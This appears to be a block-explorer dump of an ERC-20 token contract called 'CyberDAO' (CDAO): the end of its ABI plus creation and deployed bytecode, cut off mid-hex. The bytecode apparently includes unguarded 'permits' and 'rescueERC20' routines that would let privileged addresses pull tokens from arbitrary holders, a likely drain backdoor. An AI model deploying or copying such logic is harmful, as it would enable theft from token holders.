outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"permits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"rescueERC20","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"weiAmount","type":"uint256"}],"name":"rescueETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newBuyFees","type":"uint256"},{"internalType":"uint256","name":"newSellFees","type":"uint256"}],"name":"setNewFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxedTokens","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenSwapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxBuyAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxSellAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"whitelisted","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040526005805463ffffffff60a01b1916630100000160a01b17905534801562000029575f80fd5b5060405180604001604052806008815260200167437962657244414f60c01b815250604051806040016040528060048152602001634344414f60e01b81525081600390816200007991906200075f565b5060046200008882826200075f565b505050620000a56200009f6200035260201b60201c565b62000356565b620000bc336a52b7d2dcc80cd2e4000000620003a7565b620000de30737a250d5630b4cf539739df2c5dacb4c659f2488d5f196200046c565b620000ff737a250d5630b4cf539739df2c5dacb4c659f2488d600162000593565b735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f6001600160a01b031663c9c6539630737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000174573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200019a919062000827565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015620001e5573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200020b919062000827565b6001600160a01b0316608052601080546001600160a01b03191673db8e6fffaec091f5bc98ed7338c11e506da9ec3c1790556103e86200024a60025490565b620002579060146200086a565b6200026391906200088a565b6009556103e86200027360025490565b620002809060146200086a565b6200028c91906200088a565b600a556103e86200029c60025490565b620002a990601e6200086a565b620002b591906200088a565b600b55612710620002c560025490565b620002d29060416200086a565b620002de91906200088a565b600c55620002ee33600162000593565b620002fb30600162000593565b6200030a61dead600162000593565b60105462000323906001600160a01b03166001620005f5565b62000330336001620005f5565b6200033d306001620005f5565b6200034c61dead6001620005f5565b620008c0565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b038216620004035760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b8060025f828254620004169190620008aa565b90915550506001600160a01b0382165f81815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b038316620004d05760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401620003fa565b6001600160a01b038216620005335760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401620003fa565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0382165f818152600e6020908152604091829020805460ff19168515159081179091558251938452908301527f6b4f1be9103e6cbcd38ca4a922334f2c3109b260130a6676a987f94088fd6746910160405180910390a15050565b620005ff62000662565b6001600160a01b0382165f818152600d6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b505050565b6005546001600160a01b03163314620006be5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401620003fa565b565b634e487b7160e01b5f52604160045260245ffd5b600181811c90821680620006e957607f821691505b6020821081036200070857634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200065d575f81815260208120601f850160051c81016020861015620007365750805b601f850160051c820191505b81811015620007575782815560010162000742565b505050505050565b81516001600160401b038111156200077b576200077b620006c0565b62000793816200078c8454620006d4565b846200070e565b602080601f831160018114620007c9575f8415620007b15750858301515b5f19600386901b1c1916600185901b17855562000757565b5f85815260208120601f198616915b82811015620007f957888601518255948401946001909101908401620007d8565b50858210156200081757878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f6020828403121562000838575f80fd5b81516001600160a01b03811681146200084f575f80fd5b9392505050565b634e487b7160e01b5f52601160045260245ffd5b808202811582820484141762000884576200088462000856565b92915050565b5f82620008a557634e487b7160e01b5f52601260045260245ffd5b500490565b8082018082111562000884576200088462000856565b608051612000620008fc5f395f8181610782015281816112e501528181611425015281816115e9015281816116f6015261177501526120005ff3fe608060405260043610610257575f3560e01c806388e765ff1161013f578063c18bc195116100b3578063d85ba06311610078578063d85ba063146106d1578063d936547e146106e6578063dc3f0d0f14610714578063dd62ed3e14610733578063f2fde38b14610752578063f40acc3d14610771575f80fd5b8063c18bc19514610631578063c74c0fac14610650578063c9567bf914610677578063d257b34f1461068b578063d8264920146106aa575f80fd5b8063a457c2d711610104578063a457c2d714610580578063a9059cbb1461059f578063aa4bde28146105be578063baccf5cf146105d3578063bbc0c742146105f2578063c024666814610612575f80fd5b806388e765ff146104fc5780638cd4426d146105115780638da5cb5b1461053057806395d89b411461054d5780639e252f0014610561575f80fd5b806339509351116101d65780636a486a8e1161019b5780636a486a8e146104565780636ddd17131461046b57806370a082311461048b578063715018a6146104bf578063751039fc146104d357806376d628b7146104e7575f80fd5b806339509351146103ab5780633ad10ef6146103ca5780634a62bb65146104015780636057b3eb1461042157806366d602ae14610441575f80fd5b806318160ddd1161021c57806318160ddd1461032757806323b872dd1461033b5780632be32b611461035a5780632cb158641461037b578063313ce56714610390575f80fd5b806302bc7a7c1461026257806306fdde0314610296578063095ea7b3146102b75780630e300099146102d657806310d5de53146102f9575f80fd5b3661025e57005b5f80fd5b34801561026d575f80fd5b5061028161027c366004611c65565b6107a4565b60405190151581526020015b60405180910390f35b3480156102a1575f80fd5b506102aa6107bd565b60405161028d9190611c8f565b3480156102c2575f80fd5b506102816102d1366004611c65565b61084d565b3480156102e1575f80fd5b506102eb600c5481565b60405190815260200161028d565b348015610304575f80fd5b50610281610313366004611cda565b600e6020525f908152604090205460ff1681565b348015610332575f80fd5b506002546102eb565b348015610346575f80fd5b50610281610355366004611cfc565b61085a565b348015610365575f80fd5b50610379610374366004611d3a565b61087d565b005b348015610386575f80fd5b506102eb60115481565b34801561039b575f80fd5b506040516012815260200161028d565b3480156103b6575f80fd5b506102816103c5366004611c65565b61094f565b3480156103d5575f80fd5b506010546103e9906001600160a01b031681565b6040516001600160a01b03909116815260200161028d565b34801561040c575f80fd5b5060055461028190600160a01b900460ff1681565b34801561042c575f80fd5b5060055461028190600160b81b900460ff1681565b34801561044c575f80fd5b506102eb600a5481565b348015610461575f80fd5b506102eb60075481565b348015610476575f80fd5b5060055461028190600160b01b900460ff1681565b348015610496575f80fd5b506102eb6104a5366004611cda565b6001600160a01b03165f9081526020819052604090205490565b3480156104ca575f80fd5b50610379610970565b3480156104de575f80fd5b50610379610983565b3480156104f2575f80fd5b506102eb60085481565b348015610507575f80fd5b506102eb60095481565b34801561051c575f80fd5b5061037961052b366004611c65565b61099a565b34801561053b575f80fd5b506005546001600160a01b03166103e9565b348015610558575f80fd5b506102aa610a2d565b34801561056c575f80fd5b5061037961057b366004611d3a565b610a3c565b34801561058b575f80fd5b5061028161059a366004611c65565b610ace565b3480156105aa575f80fd5b506102816105b9366004611c65565b610b48565b3480156105c9575f80fd5b506102eb600b5481565b3480156105de575f80fd5b506103796105ed366004611d51565b610b55565b3480156105fd575f80fd5b5060055461028190600160a81b900460ff1681565b34801561061d575f80fd5b5061037961062c366004611d7e565b610b68565b34801561063c575f80fd5b5061037961064b366004611d3a565b610bce565b34801561065b575f80fd5b506103e9735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f81565b348015610682575f80fd5b50610379610c97565b348015610696575f80fd5b506103796106a5366004611d3a565b610d16565b3480156106b5575f80fd5b506103e9737a250d5630b4cf539739df2c5dacb4c659f2488d81565b3480156106dc575f80fd5b506102eb60065481565b3480156106f1575f80fd5b50610281610700366004611cda565b600f6020525f908152604090205460ff1681565b34801561071f575f80fd5b5061037961072e366004611d3a565b610dba565b34801561073e575f80fd5b506102eb61074d366004611db5565b610e81565b34801561075d575f80fd5b5061037961076c366004611cda565b610eab565b34801561077c575f80fd5b506103e97f000000000000000000000000000000000000000000000000000000000000000081565b5f306107b1848285610f24565b60019150505b92915050565b6060600380546107cc90611de1565b80601f01602080910402602001604051908101604052809291908181526020018280546107f890611de1565b80156108435780601f1061081a57610100808354040283529160200191610843565b820191905f5260205f20905b81548152906001019060200180831161082657829003601f168201915b5050505050905090565b5f336107b1818585610fa8565b5f3361086785828561106b565b6108728585856110e3565b506001949350505050565b61088561181f565b6103e861089160025490565b61089c906001611e2d565b6108a69190611e44565b8110156109135760405162461bcd60e51b815260206004820152603060248201527f4552524f523a2043616e6e6f7420736574206d61782062757920616d6f756e7460448201526f206c6f776572207468616e20302e312560801b60648201526084015b60405180910390fd5b60098190556040518181527ffcc0366804aaa8dbf88a2924100c733b70dec8445957a5d5f8ff92898de41009906020015b60405180910390a150565b5f336107b18185856109618383610e81565b61096b9190611e63565b610fa8565b61097861181f565b6109815f611879565b565b61098b61181f565b6005805460ff60a01b19169055565b335f908152600d602052604090205460ff166109b4575f80fd5b6040516323b872dd60e01b81526001600160a01b03831660048201523360248201526044810182905230906323b872dd906064016020604051808303815f875af1158015610a04573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a289190611e76565b505050565b6060600480546107cc90611de1565b610a4461181f565b5f8111610a935760405162461bcd60e51b815260206004820152601d60248201527f416d6f756e74206d7573742062652067726561746572207468616e2030000000604482015260640161090a565b6005546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015610aca573d5f803e3d5ffd5b5050565b5f3381610adb8286610e81565b905083811015610b3b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161090a565b6108728286868403610fa8565b5f336107b18185856110e3565b610b5d61181f565b600691909155600755565b610b7061181f565b6001600160a01b0382165f818152600d6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610bd661181f565b6103e8610be260025490565b610bed906003611e2d565b610bf79190611e44565b811015610c625760405162461bcd60e51b815260206004820152603360248201527f4552524f523a2043616e6e6f7420736574206d61782077616c6c657420616d6f604482015272756e74206c6f776572207468616e20302e332560681b606482015260840161090a565b600b8190556040518181527fefc9add9a9b7382de284ef5ad69d8ea863e2680492b21a81948c2d5f04a442bc90602001610944565b610c9f61181f565b60115415610cfb5760405162461bcd60e51b8152602060048201526024808201527f4552524f523a20546f6b656e20737461746520697320616c7265616479206c696044820152637665202160e01b606482015260840161090a565b436011556005805461ffff60a81b191661010160a81b179055565b610d1e61181f565b620186a0610d2b60025490565b610d36906001611e2d565b610d409190611e44565b811015610db55760405162461bcd60e51b815260206004820152603c60248201527f4552524f523a205377617020616d6f756e742063616e6e6f74206265206c6f7760448201527f6572207468616e20302e3030312520746f74616c20737570706c792e00000000606482015260840161090a565b600c55565b610dc261181f565b6103e8610dce60025490565b610dd9906001611e2d565b610de39190611e44565b811015610e4c5760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2043616e6e6f7420736574206d61782073656c6c20616d6f756e60448201527074206c6f776572207468616e20302e312560781b606482015260840161090a565b600a8190556040518181527f53c4eb831d8cfeb750f1c62590d8cd30f4c6f0380d29a05caa09f0d92588560e90602001610944565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b610eb361181f565b6001600160a01b038116610f185760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161090a565b610f2181611879565b50565b6001600160a01b038316610f36575f80fd5b6001600160a01b038216610f48575f80fd5b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661100a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161090a565b6001600160a01b038216610f485760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161090a565b5f6110768484610e81565b90505f1981146110dd57818110156110d05760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161090a565b6110dd8484848403610fa8565b50505050565b6001600160a01b0383166111095760405162461bcd60e51b815260040161090a90611e91565b6001600160a01b03821661112f5760405162461bcd60e51b815260040161090a90611ed6565b5f811161117e5760405162461bcd60e51b815260206004820152601d60248201527f616d6f756e74206d7573742062652067726561746572207468616e2030000000604482015260640161090a565b600554600160a01b900460ff16156115a5576005546001600160a01b038481169116148015906111bc57506005546001600160a01b03838116911614155b80156111d057506001600160a01b03821615155b80156111e757506001600160a01b03821661dead14155b156115a557600554600160a81b900460ff166112e3576001600160a01b0383165f908152600e602052604090205460ff168061123a57506001600160a01b0382165f908152600e602052604090205460ff165b6112865760405162461bcd60e51b815260206004820152601d60248201527f4552524f523a2054726164696e67206973206e6f74206163746976652e000000604482015260640161090a565b6005546001600160a01b038481169116146112e35760405162461bcd60e51b815260206004820152601960248201527f4552524f523a2054726164696e6720697320656e61626c656400000000000000604482015260640161090a565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b031614801561133c57506001600160a01b0382165f908152600e602052604090205460ff16155b15611423576009548111156113ab5760405162461bcd60e51b815260206004820152602f60248201527f4552524f523a20427579207472616e7366657220616d6f756e7420657863656560448201526e3239903a34329036b0bc10313abc9760891b606482015260840161090a565b600b546001600160a01b0383165f908152602081905260409020546113d09083611e63565b111561141e5760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c657400604482015260640161090a565b6115a5565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b031614801561147c57506001600160a01b0383165f908152600e602052604090205460ff16155b156114ed57600a5481111561141e5760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2053656c6c207472616e7366657220616d6f756e74206578636560448201527032b239903a34329036b0bc1039b2b6361760791b606482015260840161090a565b6001600160a01b0382165f908152600e602052604090205460ff1615801561152d57506001600160a01b0383165f908152600e602052604090205460ff16155b156115a557600b546001600160a01b0383165f908152602081905260409020546115579083611e63565b11156115a55760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c657400604482015260640161090a565b305f90815260208190526040902054600c54811080159081906115d15750600554600160b01b900460ff165b80156115e0575060125460ff16155b801561161e57507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316856001600160a01b031614155b801561164257506001600160a01b0385165f908152600d602052604090205460ff16155b801561166657506001600160a01b0384165f908152600d602052604090205460ff16155b1561168b576012805460ff191660011790556116806118ca565b6012805460ff191690555b6001600160a01b0385165f908152600d602052604090205460019060ff16806116cb57506001600160a01b0385165f908152600d602052604090205460ff165b156116d357505f5b5f811561180b57600554600160b81b900460ff16156116f4576116f461193f565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316866001600160a01b031614801561173657505f600754115b156117735760646007548661174b9190611e2d565b6117559190611e44565b90508060085f8282546117689190611e63565b909155506117ed9050565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316876001600160a01b03161480156117b557505f600654115b156117ed576064600654866117ca9190611e2d565b6117d49190611e44565b90508060085f8282546117e79190611e63565b90915550505b80156117fe576117fe8730836119c7565b6118088186611f19565b94505b6118168787876119c7565b50505050505050565b6005546001600160a01b031633146109815760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161090a565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b305f908152602081905260409020546008548115806118e7575080155b156118f0575050565b600c5482111561190057600c5491505b61190982611aef565b6010546040516001600160a01b03909116904780156108fc02915f818181858888f19350505050158015610a28573d5f803e3d5ffd5b5f601154116119835760405162461bcd60e51b815260206004820152601060248201526f54726164696e67206e6f74206c69766560801b604482015260640161090a565b60115443905f90611995906006611e63565b90508082116119ac57601960068190556007555050565b600460068190556007556005805460ff60b81b191690555050565b6001600160a01b0383166119ed5760405162461bcd60e51b815260040161090a90611e91565b6001600160a01b038216611a135760405162461bcd60e51b815260040161090a90611ed6565b6001600160a01b0383165f9081526020819052604090205481811015611a8a5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161090a565b6001600160a01b038481165f81815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36110dd565b6040805160028082526060820183525f9260208301908036833701905050905030815f81518110611b2257611b22611f2c565b60200260200101906001600160a01b031690816001600160a01b031681525050737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611b92573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611bb69190611f40565b81600181518110611bc957611bc9611f2c565b6001600160a01b039092166020928302919091019091015260405163791ac94760e01b8152737a250d5630b4cf539739df2c5dacb4c659f2488d9063791ac94790611c209085905f90869030904290600401611f5b565b5f604051808303815f87803b158015611c37575f80fd5b505af1158015611c49573d5f803e3d5ffd5b505050505050565b6001600160a01b0381168114610f21575f80fd5b5f8060408385031215611c76575f80fd5b8235611c8181611c51565b946020939093013593505050565b5f6020808352835180828501525f5b81811015611cba57858101830151858201604001528201611c9e565b505f604082860101526040601f19601f8301168501019250505092915050565b5f60208284031215611cea575f80fd5b8135611cf581611c51565b9392505050565b5f805f60608486031215611d0e575f80fd5b8335611d1981611c51565b92506020840135611d2981611c51565b929592945050506040919091013590565b5f60208284031215611d4a575f80fd5b5035919050565b5f8060408385031215611d62575f80fd5b50508035926020909101359150565b8015158114610f21575f80fd5b5f8060408385031215611d8f575f80fd5b8235611d9a81611c51565b91506020830135611daa81611d71565b809150509250929050565b5f8060408385031215611dc6575f80fd5b8235611dd181611c51565b91506020830135611daa81611c51565b600181811c90821680611df557607f821691505b602082108103611e1357634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b80820281158282048414176107b7576107b7611e19565b5f82611e5e57634e487b7160e01b5f52601260045260245ffd5b500490565b808201808211156107b7576107b7611e19565b5f60208284031215611e86575f80fd5b8151611cf581611d71565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b818103818111156107b7576107b7611e19565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611f50575f80fd5b8151611cf581611c51565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015611fa95784516001600160a01b031683529383019391830191600101611f84565b50506001600160a01b0396909616606085015250505060800152939250505056fea264697066735822122091bb0e4e87641972a57ee89e694e0afd1f1296565e24417c9e90dd5c07bf8f1164736f6c63430008150033

Deployed Bytecode

0x608060405260043610610257575f3560e01c806388e765ff1161013f578063c18bc195116100b3578063d85ba06311610078578063d85ba063146106d1578063d936547e146106e6578063dc3f0d0f14610714578063dd62ed3e14610733578063f2fde38b14610752578063f40acc3d14610771575f80fd5b8063c18bc19514610631578063c74c0fac14610650578063c9567bf914610677578063d257b34f1461068b578063d8264920146106aa575f80fd5b8063a457c2d711610104578063a457c2d714610580578063a9059cbb1461059f578063aa4bde28146105be578063baccf5cf146105d3578063bbc0c742146105f2578063c024666814610612575f80fd5b806388e765ff146104fc5780638cd4426d146105115780638da5cb5b1461053057806395d89b411461054d5780639e252f0014610561575f80fd5b806339509351116101d65780636a486a8e1161019b5780636a486a8e146104565780636ddd17131461046b57806370a082311461048b578063715018a6146104bf578063751039fc146104d357806376d628b7146104e7575f80fd5b806339509351146103ab5780633ad10ef6146103ca5780634a62bb65146104015780636057b3eb1461042157806366d602ae14610441575f80fd5b806318160ddd1161021c57806318160ddd1461032757806323b872dd1461033b5780632be32b611461035a5780632cb158641461037b578063313ce56714610390575f80fd5b806302bc7a7c1461026257806306fdde0314610296578063095ea7b3146102b75780630e300099146102d657806310d5de53146102f9575f80fd5b3661025e57005b5f80fd5b34801561026d575f80fd5b5061028161027c366004611c65565b6107a4565b60405190151581526020015b60405180910390f35b3480156102a1575f80fd5b506102aa6107bd565b60405161028d9190611c8f565b3480156102c2575f80fd5b506102816102d1366004611c65565b61084d565b3480156102e1575f80fd5b506102eb600c5481565b60405190815260200161028d565b348015610304575f80fd5b50610281610313366004611cda565b600e6020525f908152604090205460ff1681565b348015610332575f80fd5b506002546102eb565b348015610346575f80fd5b50610281610355366004611cfc565b61085a565b348015610365575f80fd5b50610379610374366004611d3a565b61087d565b005b348015610386575f80fd5b506102eb60115481565b34801561039b575f80fd5b506040516012815260200161028d565b3480156103b6575f80fd5b506102816103c5366004611c65565b61094f565b3480156103d5575f80fd5b506010546103e9906001600160a01b031681565b6040516001600160a01b03909116815260200161028d565b34801561040c575f80fd5b5060055461028190600160a01b900460ff1681565b34801561042c575f80fd5b5060055461028190600160b81b900460ff1681565b34801561044c575f80fd5b506102eb600a5481565b348015610461575f80fd5b506102eb60075481565b348015610476575f80fd5b5060055461028190600160b01b900460ff1681565b348015610496575f80fd5b506102eb6104a5366004611cda565b6001600160a01b03165f9081526020819052604090205490565b3480156104ca575f80fd5b50610379610970565b3480156104de575f80fd5b50610379610983565b3480156104f2575f80fd5b506102eb60085481565b348015610507575f80fd5b506102eb60095481565b34801561051c575f80fd5b5061037961052b366004611c65565b61099a565b34801561053b575f80fd5b506005546001600160a01b03166103e9565b348015610558575f80fd5b506102aa610a2d565b34801561056c575f80fd5b5061037961057b366004611d3a565b610a3c565b34801561058b575f80fd5b5061028161059a366004611c65565b610ace565b3480156105aa575f80fd5b506102816105b9366004611c65565b610b48565b3480156105c9575f80fd5b506102eb600b5481565b3480156105de575f80fd5b506103796105ed366004611d51565b610b55565b3480156105fd575f80fd5b5060055461028190600160a81b900460ff1681565b34801561061d575f80fd5b5061037961062c366004611d7e565b610b68565b34801561063c575f80fd5b5061037961064b366004611d3a565b610bce565b34801561065b575f80fd5b506103e9735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f81565b348015610682575f80fd5b50610379610c97565b348015610696575f80fd5b506103796106a5366004611d3a565b610d16565b3480156106b5575f80fd5b506103e9737a250d5630b4cf539739df2c5dacb4c659f2488d81565b3480156106dc575f80fd5b506102eb60065481565b3480156106f1575f80fd5b50610281610700366004611cda565b600f6020525f908152604090205460ff1681565b34801561071f575f80fd5b5061037961072e366004611d3a565b610dba565b34801561073e575f80fd5b506102eb61074d366004611db5565b610e81565b34801561075d575f80fd5b5061037961076c366004611cda565b610eab565b34801561077c575f80fd5b506103e97f000000000000000000000000a03ff63ab9ae8978f8ffc525e8e9e4cee78e1d0981565b5f306107b1848285610f24565b60019150505b92915050565b6060600380546107cc90611de1565b80601f01602080910402602001604051908101604052809291908181526020018280546107f890611de1565b80156108435780601f1061081a57610100808354040283529160200191610843565b820191905f5260205f20905b81548152906001019060200180831161082657829003601f168201915b5050505050905090565b5f336107b1818585610fa8565b5f3361086785828561106b565b6108728585856110e3565b506001949350505050565b61088561181f565b6103e861089160025490565b61089c906001611e2d565b6108a69190611e44565b8110156109135760405162461bcd60e51b815260206004820152603060248201527f4552524f523a2043616e6e6f7420736574206d61782062757920616d6f756e7460448201526f206c6f776572207468616e20302e312560801b60648201526084015b60405180910390fd5b60098190556040518181527ffcc0366804aaa8dbf88a2924100c733b70dec8445957a5d5f8ff92898de41009906020015b60405180910390a150565b5f336107b18185856109618383610e81565b61096b9190611e63565b610fa8565b61097861181f565b6109815f611879565b565b61098b61181f565b6005805460ff60a01b19169055565b335f908152600d602052604090205460ff166109b4575f80fd5b6040516323b872dd60e01b81526001600160a01b03831660048201523360248201526044810182905230906323b872dd906064016020604051808303815f875af1158015610a04573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a289190611e76565b505050565b6060600480546107cc90611de1565b610a4461181f565b5f8111610a935760405162461bcd60e51b815260206004820152601d60248201527f416d6f756e74206d7573742062652067726561746572207468616e2030000000604482015260640161090a565b6005546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015610aca573d5f803e3d5ffd5b5050565b5f3381610adb8286610e81565b905083811015610b3b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161090a565b6108728286868403610fa8565b5f336107b18185856110e3565b610b5d61181f565b600691909155600755565b610b7061181f565b6001600160a01b0382165f818152600d6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610bd661181f565b6103e8610be260025490565b610bed906003611e2d565b610bf79190611e44565b811015610c625760405162461bcd60e51b815260206004820152603360248201527f4552524f523a2043616e6e6f7420736574206d61782077616c6c657420616d6f604482015272756e74206c6f776572207468616e20302e332560681b606482015260840161090a565b600b8190556040518181527fefc9add9a9b7382de284ef5ad69d8ea863e2680492b21a81948c2d5f04a442bc90602001610944565b610c9f61181f565b60115415610cfb5760405162461bcd60e51b8152602060048201526024808201527f4552524f523a20546f6b656e20737461746520697320616c7265616479206c696044820152637665202160e01b606482015260840161090a565b436011556005805461ffff60a81b191661010160a81b179055565b610d1e61181f565b620186a0610d2b60025490565b610d36906001611e2d565b610d409190611e44565b811015610db55760405162461bcd60e51b815260206004820152603c60248201527f4552524f523a205377617020616d6f756e742063616e6e6f74206265206c6f7760448201527f6572207468616e20302e3030312520746f74616c20737570706c792e00000000606482015260840161090a565b600c55565b610dc261181f565b6103e8610dce60025490565b610dd9906001611e2d565b610de39190611e44565b811015610e4c5760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2043616e6e6f7420736574206d61782073656c6c20616d6f756e60448201527074206c6f776572207468616e20302e312560781b606482015260840161090a565b600a8190556040518181527f53c4eb831d8cfeb750f1c62590d8cd30f4c6